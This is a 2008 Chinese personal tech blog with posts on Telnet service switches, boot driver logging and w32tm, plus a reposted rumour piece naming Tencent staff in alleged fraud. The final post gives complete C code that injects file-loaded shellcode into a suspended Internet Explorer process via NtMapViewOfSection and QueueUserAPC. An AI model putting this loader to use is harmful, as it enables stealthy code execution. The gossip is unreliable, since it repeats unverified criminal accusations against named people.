爱看电影,爱做梦

2008年12月25日

tlntsvr 命令行参数

类归于: 技术文档 — kermit @ 23:26

偶注意到很多人使用opentelnet.exe开启telnet后门,因此想卸载telnet服务,
需要的时候再添加上。Google一把,没有找到相关的介绍,只好自己动手丰衣足食。

(以下均为CMD中执行 系统win2000 pro sp4 + 到2005.01.15之前微软的所有补丁)

卸载 telnet服务 : tlntsvr  -UnregServer
安装 telnet服务 : tlntsvr -Service

如果系统已经有tlntsvr服务,那么卸载后再安装的服务显示名称为:
Microsoft Telnet Service ,显示名称和以前的稍有不同.

如果再次 tlntsvr ?-UnregServer 卸载telnet服务.则会弹出 ?
“不能删除注册表项目”对话框三次. 但不影响卸载.

为什么会弹出对话框呢? IDA静态分析和OllyDbg跟踪后发现使用参数UnregServer
删除了注册表telnet服务所有的相关内容.(有些键值已不存在)

如何不弹出对话框?继续探索.–>使用参数 RegServer
卸载 telnet服务 : tlntsvr -RegServer

参数 RegServer和UnregServer区别在于:后者删除注册表键值+服务,前者只是删除服务

其它问题:
运行以上参数最好在不同的cmd中执行.
否则会遇见执行tlntsvr -Service 过好久后才安装上服务的现象.

现在你可以展开想象的空间……

2008年12月21日

整理以往的文档

类归于: 技术文档 — kermit @ 21:44
整理了一下以前发的附件文档到这个帖子
Configuring or Troubleshooting a Juniper Firewall VPN
SQL Server 2005 SP3简体中文版:
(注意,SQLEXPR_CHS.EXE可以在32/64位系统上安装,SQLEXPR32_CHS.EXE则只能用于32位系统。)
相关资源—
知识库文章KB921896(尚未更新):
http://support.microsoft.com/kb/921896/en-us
人品计算器
马加爵的网络维护经验
凯文米特欺骗的艺术 英文版本
http://blogimg.chinaunix.net/blog/upfile/070314114246.pdf
CoBit 4 下载(英文版本)
COBIT的全称是“Control Objectives for Information and related Technology”。
http://blogimg.chinaunix.net/blog/upfile/070314204014.rar
Secure Programming Cookbook for C and C++.chm
http://blogimg.chinaunix.net/blog/upfile/071007205541.chm
cisco2950 IOS下载
泥鸽靶
这是一本股票经纪和基金经理不希望你看到的书,却是一本你不能不看的书。 《泥鸽靶》是一个“内部人”的成长记录,是一本关于20世纪90年代弱肉强食的高等金融活动的令人叹为观止的教科书,它记录了一个初出茅庐的摩根士丹利经纪人学习游戏规则的历程。从纽约到东京,从南美到亚洲,这个复杂而残酷的网络创造着,交易着那些匪夷所思而又深不可测的证券品种——几乎没有人真正理解这些证券品种,特别是那些毫无心机又不精于此道的买家。数十亿美元的财富就此损失殆尽,其中可能包括你的一部分,不论你是否知情。 弗兰克·帕特诺伊的经历多少带有漫画色彩,文中不乏不可思议的人物。但是他揭露的黑幕应当引起所有投资者的恐惧和警觉——不论你持有的是股票,投资基金,甚至保险产品、金融衍生产品的世界充满了狂野的“火箭科学家”,他们游说毫无防备的受害者购买衍生产品(其价值与其他证券相关或“衍生”于其他证券),这些经纪人经常笑称他们的创造发明是大规模杀伤性武器,此言非虚,现实中也确实经常有客户被“轰上西天”或是被“撕掉脸”的事发生,现实生活中的衍生产品文难涉及了奥兰治县,霸菱银行,宝洁以及更多的公司。

查看windows系统启动时加载的驱动

类归于: 技术文档 — kermit @ 13:16
环境 vmware6.5下winxp? 增加一个串口设备,工具: Named Pipe TCP Proxy ,串口的配置如下
?

配置boot.ini 具体可以参考
Windows XP 和 Windows Server 2003 的 Boot.ini 文件的可用开关选项
CMD下执行命令 BOOTCFG /EMS ON /PORT COM1 /BAUD 19200 /ID 1
同时在boot.ini中增加 OS加载选项: /noguiboot /sos /bootlog /redirect
boot.ini配置如下
[boot loader]
timeout=10
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
redirect=COM1
redirectbaudrate=19200
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional”? /noguiboot /sos /bootlog /redirect
systemroot\Ntbtlog.txt日志中查看记录
Service Pack 211 29 2008 14:24:14.250
Loaded driver \WINDOWS\system32\ntkrnlpa.exe
Loaded driver \WINDOWS\system32\hal.dll
Loaded driver \WINDOWS\system32\KDCOM.DLL
Loaded driver \WINDOWS\system32\BOOTVID.dll
Loaded driver ACPI.sys
Loaded driver \WINDOWS\system32\DRIVERS\WMILIB.SYS
Loaded driver pci.sys
Loaded driver isapnp.sys
Loaded driver compbatt.sys
Loaded driver \WINDOWS\system32\DRIVERS\BATTC.SYS
Loaded driver intelide.sys
Loaded driver \WINDOWS\system32\DRIVERS\PCIIDEX.SYS
Loaded driver MountMgr.sys
Loaded driver ftdisk.sys
Loaded driver dmload.sys
Loaded driver dmio.sys
Loaded driver PartMgr.sys
Loaded driver VolSnap.sys
Loaded driver atapi.sys
Loaded driver vmscsi.sys
Loaded driver \WINDOWS\system32\DRIVERS\SCSIPORT.SYS
Loaded driver disk.sys
Loaded driver \WINDOWS\system32\DRIVERS\CLASSPNP.SYS
Loaded driver fltMgr.sys
Loaded driver KSecDD.sys
Loaded driver Ntfs.sys
Loaded driver NDIS.sys
Loaded driver Mup.sys
Loaded driver agp440.sys
Loaded driver \SystemRoot\system32\DRIVERS\i8042prt.sys
Loaded driver \SystemRoot\system32\DRIVERS\kbdclass.sys
Loaded driver \SystemRoot\system32\DRIVERS\vmmouse.sys
Loaded driver \SystemRoot\system32\DRIVERS\mouclass.sys
Loaded driver \SystemRoot\system32\DRIVERS\parport.sys
Loaded driver \SystemRoot\system32\DRIVERS\serial.sys
Loaded driver \SystemRoot\system32\DRIVERS\serenum.sys
Loaded driver \SystemRoot\system32\DRIVERS\fdc.sys
Loaded driver \SystemRoot\system32\DRIVERS\cdrom.sys
Loaded driver \SystemRoot\system32\DRIVERS\redbook.sys
Loaded driver \SystemRoot\system32\DRIVERS\vmx_svga.sys
Loaded driver \SystemRoot\system32\DRIVERS\vmxnet.sys
Loaded driver \SystemRoot\system32\DRIVERS\CmBatt.sys
Loaded driver \SystemRoot\system32\DRIVERS\processr.sys
Loaded driver \SystemRoot\system32\DRIVERS\fsvga.sys
Loaded driver \SystemRoot\system32\DRIVERS\audstub.sys
Loaded driver \SystemRoot\system32\DRIVERS\rasl2tp.sys
Loaded driver \SystemRoot\system32\DRIVERS\ndistapi.sys
Loaded driver \SystemRoot\system32\DRIVERS\ndiswan.sys
Loaded driver \SystemRoot\system32\DRIVERS\raspppoe.sys
Loaded driver \SystemRoot\system32\DRIVERS\raspptp.sys
Loaded driver \SystemRoot\system32\DRIVERS\msgpc.sys
Loaded driver \SystemRoot\system32\DRIVERS\psched.sys
Loaded driver \SystemRoot\system32\DRIVERS\ptilink.sys
Loaded driver \SystemRoot\system32\DRIVERS\raspti.sys
Loaded driver \SystemRoot\system32\DRIVERS\rdpdr.sys
Loaded driver \SystemRoot\system32\DRIVERS\termdd.sys
Loaded driver \SystemRoot\system32\DRIVERS\swenum.sys
Loaded driver \SystemRoot\system32\DRIVERS\update.sys
Loaded driver \SystemRoot\system32\DRIVERS\mssmbios.sys
Loaded driver \SystemRoot\System32\Drivers\NDProxy.SYS
Did not load driver \SystemRoot\System32\Drivers\NDProxy.SYS
Did not load driver \SystemRoot\System32\Drivers\lbrtfdc.SYS
Did not load driver \SystemRoot\System32\Drivers\Sfloppy.SYS
Did not load driver \SystemRoot\System32\Drivers\i2omgmt.SYS
Did not load driver \SystemRoot\System32\Drivers\Changer.SYS
Did not load driver \SystemRoot\System32\Drivers\Cdaudio.SYS
Loaded driver \SystemRoot\System32\Drivers\Fs_Rec.SYS
Loaded driver \SystemRoot\System32\Drivers\Null.SYS
Loaded driver \SystemRoot\System32\Drivers\Beep.SYS
Loaded driver \SystemRoot\System32\drivers\vga.sys
Loaded driver \SystemRoot\System32\Drivers\mnmdd.SYS
Loaded driver \SystemRoot\System32\DRIVERS\RDPCDD.sys
Loaded driver \SystemRoot\System32\Drivers\Msfs.SYS
Loaded driver \SystemRoot\System32\Drivers\Npfs.SYS
Loaded driver \SystemRoot\system32\DRIVERS\rasacd.sys
Loaded driver \SystemRoot\system32\DRIVERS\ipsec.sys
Loaded driver \SystemRoot\system32\DRIVERS\tcpip.sys
Loaded driver \SystemRoot\system32\DRIVERS\netbt.sys
Loaded driver \SystemRoot\System32\drivers\afd.sys
Loaded driver \SystemRoot\system32\DRIVERS\netbios.sys
Loaded driver \SystemRoot\system32\DRIVERS\wanarp.sys
Did not load driver \SystemRoot\System32\Drivers\PCIDump.SYS
Loaded driver \SystemRoot\system32\DRIVERS\rdbss.sys
Loaded driver \SystemRoot\system32\DRIVERS\mrxsmb.sys
Did not load driver \SystemRoot\system32\DRIVERS\imapi.sys
Loaded driver \SystemRoot\System32\Drivers\Fips.SYS
Loaded driver \SystemRoot\System32\Drivers\Cdfs.SYS
Loaded driver \SystemRoot\system32\DRIVERS\ndisuio.sys
Loaded driver \SystemRoot\System32\DRIVERS\hgfs.sys
Did not load driver \SystemRoot\system32\DRIVERS\rdbss.sys
Did not load driver \SystemRoot\system32\DRIVERS\mrxsmb.sys
Loaded driver \SystemRoot\system32\DRIVERS\mrxdav.sys
Loaded driver \SystemRoot\System32\Drivers\ParVdm.SYS
Loaded driver \SystemRoot\system32\DRIVERS\srv.sys
Loaded driver \SystemRoot\System32\Drivers\HTTP.sys
?

通过 Named Pipe TCP Proxy可以看到?
? multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\ntkrnlpa.exe
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\hal.dll
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\KDCOM.DLL
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\BOOTVID.dll
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\config\system
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\c_936.nls
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\l_intl.nls
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\FONTS\vgaoem.fon
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\AppPatch\drvmain.sdb
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\ACPI.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\WMILIB.SYS
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\pci.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\isapnp.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\compbatt.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\BATTC.SYS
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\intelide.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\PCIIDEX.SYS
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\System32\Drivers\MountMgr.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\ftdisk.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\System32\drivers\dmload.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\System32\drivers\dmio.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\System32\Drivers\PartMgr.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\System32\Drivers\VolSnap.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\atapi.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\vmscsi.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\SCSIPORT.SYS
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\disk.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\CLASSPNP.SYS
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\fltMgr.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\System32\Drivers\KSecDD.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\System32\Drivers\Ntfs.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\System32\Drivers\NDIS.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\System32\Drivers\Mup.sys
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\system32\DRIVERS\agp440.sys

2008年12月20日

八卦一下:腾迅三人被抓事件(ZZ)

类归于: 绝对八卦新闻 — kermit @ 20:22
以下都是从网络上转载后临时整理的,不代表个人观点。
传说
2008-12-11消息
有传言腾迅某销售部门集体被抓,包括腾讯副总裁刘朝阳
此事最早是腾讯内部员工在天涯爆出,随后各论坛转帖。腾讯公关紧急通过TECHWEB发了上述声明
(腾讯和TECHWEB的公关保护关系可见一斑,不找新浪、SOHU、DONEWS,只找TECHWEB)
随后腾讯开始大规模删帖,天涯的原始贴已被删:http://www.tianya.cn/publicforum/content/no06/1/98427.shtml
传说中所谓的内幕
上午看见有几个贴在说腾讯南方销售团队被KO的帖子,小弟我也知道点情况,不妨来告诉大家点真实情况。
这事儿吧,还真不是假的。绝对是真的。你得相信。看看我说得在理不,hoho!
话得从广告销售圈的一个潜规则说起,大家都知道,销售的提成很高吧。大家也都知道,门户都是有很多4A广告公司一起卖广告的,这样,广告公司会先提成返点,公司销售人员也会提成。这其实造成了不少漏洞。
你看也到年底了,不少广告公司或者销售人员都有销售任务的,任务没完成,4A和销售都难受。所以,每个人可能都有自己的广告公司或者朋友的公司,我先把已经拉到的1000万广告费通过某家广告公司,这样,广告公司完成了年底任务,还能提成,这些提成肯定会回扣给公司销售,然后广告公司再和腾讯结算,销售还能再提一次成,还完成了自己的销售任务。一举多得。
当然,这里面最吃亏的就是腾讯了,本来1000万,直接到公司,那得多少钱啊,现在绕了广告公司一圈,各种费用下来,怎么着几百万没了。你说人家腾讯能不生气嘛:)
我说我的,你听你的,爱信不信。
这次被抓出来的刘朝阳,是腾讯的元老级员工,职位副总裁,目前不确定但他是这次事件的关键人。有传言,幕后大佬,是曾经和马化腾一起创业后来分道扬镳的曾李青网势经典公司.
这家在网上都没有任何公开信息的网势经典公关公司是个肥的流油的公司。说了你都不信,这家公司的年流水至少在9位数!!这是什么概念!自己掰着手指头算去。
传说后的验证
12月12日消息
有记者从腾讯那里得到确切消息,以下腾讯对外声明概要:
  腾讯公司相关负责人证实,确有个别销售人员被内部调查,但外界传言违规人员已被逮捕的说法不实。该负责人表示,12月初,腾讯在例行的内部审查中发现有三名广告销售员工涉嫌违反销售纪律,之后这三人被内部停职调查,这属于企业正常的执行内审制度.
其他途径的消息:
  一、可靠消息,确实有三名广告销售员工被待到公安协助调查,被内部停职。但是为了协助公安调查他们的老板,也就是腾讯副总裁、广告总经理刘朝阳!
  二、出事后,刘朝阳在腾讯的邮箱、RTX账号、座机电话等,都已经从腾讯通讯录上删除。刘朝阳手机被公安设为秘书台,收集证据。
  三、外面过帐的广告公司,是刘朝阳伙同下面销售人员开得,年代理销售额过亿元,主要靠年终返点赚钱。
12月18日消息
搜狐IT获悉,腾讯内部已于近日内部宣布重组华南销售部,任命道峰兼任华南销售中心总监。这也是腾讯自南方销售部内审出问题后的架构重组。具体任命如下:任命道峰兼任华南销售中心总监,向主管网络媒体业务系统的EVP(执行副总裁)汇报;任命吴洁茹兼任渠道中心下华南渠道组副总监,向道峰汇报工作,同时协助负责华南地区广告销售相关工作的管理。同时腾讯还宣布免去原华南销售部负责人肖峰职务。
回顾
腾讯严厉处罚内部违规员工案例
2005年9月,腾讯公司监控部门发现无线产品部负责的3G腾讯网存在重大安全问题,遂对时任开发人员以及中高层负责人罚款2万余元。
2005年9月,腾讯公司监控部门发现互动娱乐事业部管理的QQ宠物相关业务存在严重安全问题,遂对时任相关负责人罚款5000元。
2005年12月,腾讯公司监控部门发现无线产品部“网站联盟”业务系统存在恶意后门程序,遂对时任相关开发人员贺某予以开除处理。
2006年1月,腾讯公司发现移动通信部陈某在其负责的广告投放业务中涉嫌利用职务之便谋取私利,遂决定开除当事人并对时任相关领导罚款1万元。
  
其他八卦消息
?
腾讯销售门爆出高管矛盾:刘胜义与刘朝阳之争?
说白了,这是两个高管之间的争斗。刘胜义和刘朝阳,两个本家,在这个事情上,刘胜义是正义的一方。刘朝阳是非正义的。所以很容易被扳倒。刘朝阳是跟着小马打江山的老员工,来个空降兵压着他当然不舒服。向上走没机会,干脆自己捞点实惠划算。刘朝阳是腾讯公司副总裁及广告销售部总经理。刘胜义也负责广告业务。其实都怪小马哥啊,这2人是如此的相近,因此,利益之争在所难免。哈哈。整那么多副总裁干啥呢?
刘胜义,2006年加盟腾讯,负责拓展公司的网络广告业务,并负责优化公司及重点产品的品牌。刘胜义先生在品牌管理与广告业经验丰富,在知名国际广告公司的工作经验超过15年,并在近12年间一直担任中国业务的领导职位。2007年初,刘胜义先生被中国广告协会评选为“2006年度中国广告业年度人物”。加盟腾讯之前,他曾担任阳狮(Publicis)中国的执行合伙人,天联(BBDO)中国的首席执行官,以及在上海担任电通扬雅(Dentsu Young & Rubicam)和麦肯集团(McCann-Erickson)在京港两地的高管职位。刘先生在广告行业著述甚丰,经常在行业会议上发表演说,并曾于2003年担任上海4A委员会主席。刘胜义先生拥有美国新泽西州立拉杰斯大学的EMBA学位。
开会
某门户内容副总裁、总编把整个内容部门从无到有,辛苦几年一手拉扯起来,现在据说流量已经高居第一。
2008年,总编考虑继续提升内容影响力,同时改善整个内容管理架构,让手下的部门总监们也能提高些职位,提成总经理
总编想出来的一个办法,就在公司管委会上提了。把内容部门重新划分为4、5个跟现在内容部平级的部门。
能干上大公司高管的人,当然都不是傻子。总编动议一提出,估计每个高管都开始计算自己的得失,脑子的运转速度绝对不会是286、386电脑。
沉默之后,某高管提问,谁来管这几个部门?潜台词很明显了:既然你提出来重新划分部门,可不是默认还由你继续来管,谁来管,得讨论讨论。估计这个时候,总编听到这个,心里出乎意料的一片瓦凉。
这还是冷风,接下来就是寒流。
总编上面空降而来的执行副总裁马上接过了话茬:都直接向我汇报。
这下总编傻了眼,不仅没有拉扯兄弟,很可能把自己饭碗给砸了。饭碗要被砸了是很现实的问题,因为最近,内容部销售副总裁和他一帮兄弟的饭碗被砸了。
后面的情况不太了解,如果再没有其他人继续接执行副总裁的话,总编没有自己的哥们,或者其他高管不在管委会上说话,哪怕是说这个事情是大事,得通盘考虑,以后再议,总编就被拿下了。
马化腾现有以及曾经的态度
马化腾知道刘朝阳犯事,计划提前抛售腾讯股票减少损失;
11月中,小马即掌握到刘朝阳犯事的确切证据,并打算挥泪斩马谡;
但,上市公司负责广告业务的高管涉嫌经济犯罪,如果被媒体爆光,将会严重影响股价;
11月20后,大概是26号,小马决心以下,先抛售约5亿港元股票,套现再说;
12月初,腾讯联手Gong’AN,动手处理刘朝阳及相关小弟。
其它人的观点
昨天,因为朋友跟腾讯之间的一点“误会”,说起了马化腾。
朋友说起了几年前,他的一个朋友在腾讯工作,大概因为倒卖了一些Q币,被检举然后被批捕。最后找了腾讯的某位高管求情,关押一些日子后被放了。
前些日子,腾讯销售部据说一位部门负责人、二位销售总监,也被举报逮捕,具体原因,腾讯的人都忌讳很深,不愿意提起。这次除了销售部,腾讯其他一些部门也在内查内审。

我听到的说法一个是,哥几个自己在外头开广告公司或者找别的广告公司,把本来是公司直销的客户,通过广告公司走帐,从腾讯公司拿到更低的折扣价,卖出去的溢价部分再个人分帐,损坏了公司利益。

腾讯的编辑部,2、3年前,曾经也听说有主编、副主编、编辑几个人出了些事情,被开除。

据说查出来的办法是:编辑部高层让他在某公司的朋友给主编等等电话,说给一笔费用给发稿或者做专题,反正最后掉进去的不止1、2个人。

几年前,某个IT网站曾经也和腾讯、马化腾有过节,最后在深圳南山法院打起了官司,某位著名记者被判决赔偿50万元。

联想到珊瑚虫QQ的事情,陈寿福被抓被判刑。曾经有机会跟马化腾一起吃饭,问起这个事情,马化腾很委屈,大致反问,腾讯做的不对吗?QQ是腾讯的命根子。

51.com一样也做QQ外挂,腾讯起诉了10几个离职去51.com的员工,不过跟51之间这次仅限于口水战了。也有说法,马化腾曾经给51的几个投资人亲自打电话,提醒他们,他们投资的公司是不是就是为了做外挂,这种偏门生意。

说了这么多,道理和法律似乎都在腾讯、马化腾这边。

曾经跟腾讯的人交流,就没有别的处理方法了吗?

人家反问,你觉得怎么处理好?我也不知道,只能沉默。

windows系统时间同步

类归于: 技术文档 — kermit @ 19:15
怕忘记了 记录下先.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient分支,在右边找到SpecialInterval项双击就可以修改该项的数值了,这就是同步时间间隔的数值,以秒为单位,点十进制就可以修改您想要的数值了!2008-12-20
C:\>w32tm.exe
w32tm [/? | /register | /unregister ]
? – 此帮助屏幕。
register – 注册为作为服务运行并且添加默认
配置到注册表。
unregister – 解除服务注册并删除所有配置
来自注册表的信息。
w32tm /monitor [/domain:<domain name>]
[/computers:<name>[,<name>[,<name>...]]]
[/threads:<num>]
domain – 指定要监视的域。如果没有指定
域名,或者没有指定域或者计算机
选项,将使用默认域。此选项
可以多次使用。
computers – 监视给定的计算机列表。计算机
名称由逗号分隔,没有空格。如果名称
有前缀 ‘*’,它将被视为一个 PDC。此选项
可以多次使用。
threads – 同时分析的计算机数量。默认
值为 3。允许的范围是 1-50。
w32tm /ntte <NT time epoch>
转换一个 NT 系统时间,以 (10^-7)s 间隔从 0h 1-Jan 1601,
到一个可读的格式。
w32tm /ntpte <NTP time epoch>
转换一个 NTP 时间,以 (2^-32)s 间隔从 0h 1-Jan 1900,到
一个可读的格式。
w32tm /resync [/computer:<computer>] [/nowait] [/rediscover] [/soft]
告诉计算机它应该尽快同步它的时钟,
丢弃所有积累的错误统计。
computer:<computer> – 需要重新同步的计算机。如果没有
指定,将重新同步本地计算机。
nowait – 不等待重新同步发生;
立即返回。否则,在返回前等待重新同步
执行完毕。
rediscover – 重新检测网络配置并重新发现
网络资源,然后重新同步。
soft – 利用现有错误统计重新同步。没有什么用处,
为兼容性而提供。
w32tm /stripchart /computer:<target> [/period:<refresh>]
[/dataonly] [/samples:<count>]
显示此计算机和另一计算机之间的偏移量
的条带图。
computer:<target> – 要测量偏移量的计算机。
period:<refresh> – 在示例之间的时间间隔,以秒为单位。
默认为 2 秒
dataonly – 只显示数据,没有图表。
samples:<count> – 收集 <count> 示例,然后停止。如果没有
指定,将一直收集示例,直到按下 Ctrl-C。
w32tm /config [/computer:<target>] [/update]
[/manualpeerlist:<peers>] [/syncfromflags:<source>]
[/LocalClockDispersion:<seconds>]
computer:<target> – 调整 <target> 的配置。如果没有
指定,默认为本地计算机。
update – 通知时间服务配置被
更改,使更改生效。
manualpeerlist:<peers> – 设置手动对等列表为 <peers>,
which is a space-delimited list of DNS and/or IP addresses.
指定多对等端时,该开关必须用引号
括起来。
syncfromflags:<source> – 设置 NTP 客户要同步自
的源。<source> 应该是一个这些关键字的以
逗号分隔的列表(不区分大小写):
MANUAL – 从手动对等端列表包括对等端
DOMHIER – 从域层次的一个 DC 同步
w32tm /tz
显示当前时区设置。
w32tm /dumpreg [/subkey:<key>] [/computer:<target>]
显示与给定注册键相关的值。
默认键为 HKLM\System\CurrentControlSet\Services\W32Time
(时间服务的根键)。
subkey:<key> – 显示与默认键的子键 <key> 相关的值。
computer:<target> – 查询计算机 <target> 的注册表设置

2008年12月6日

远程代码注入新技术(ZZ)

类归于: 源代码 — kermit @ 11:04
朋友yole分享过来的!!
研究出了一种新的在远程进程中执行代码的可能性,就是利用一个未公开函数在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完 全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求。让源码说明一切:(我为我的英文水平感到抱歉,我来自德国)
CODE:
#define _WIN32_WINNT 0×0400
#include <windows.h>

typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;

typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );

func_NtMapViewOfSection NtMapViewOfSection = NULL;
LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;
ULONG Protect;
LPVOID ViewBase;
// 转换偏移量

SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;

// 保存大小和起始地址

ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;

// 转换标志为NT保护属性

if (dwDesiredAccess & FILE_MAP_WRITE)
{
Protect = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
Protect = PAGE_WRITECOPY;
}
else
{
Protect = PAGE_NOACCESS;
}

//映射区段

Status = NtMapViewOfSection(hFileMappingObject,
hProcess,
&ViewBase,
0,
0,
&SectionOffset,
&ViewSize,
ViewShare,
0,
Protect);
if (!NT_SUCCESS(Status))
{
// 失败

return NULL;
}

//返回起始地址

return ViewBase;
}

int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
HMODULE hDll = LoadLibrary( “ntdll.dll” );

NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, “NtMapViewOfSection”);

// 取ShellCode,任何你想实现的

HANDLE hFile = CreateFile (“C:\shellcode.txt”, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);

// 启动目标进程

STARTUPINFO st;
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);

PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));

CreateProcess (“C:\Programme\Internet Explorer\iexplore.exe”, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);
// 注入shellcode到目标进程地址空间

LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);

// 创建一个新的能够在目标线程恢复是首先执行的APC

QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
ResumeThread (pi.hThread);
CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}

Copyright @ 2006-2010 houquner.com. All Rights Reserved.   京ICP备09057126号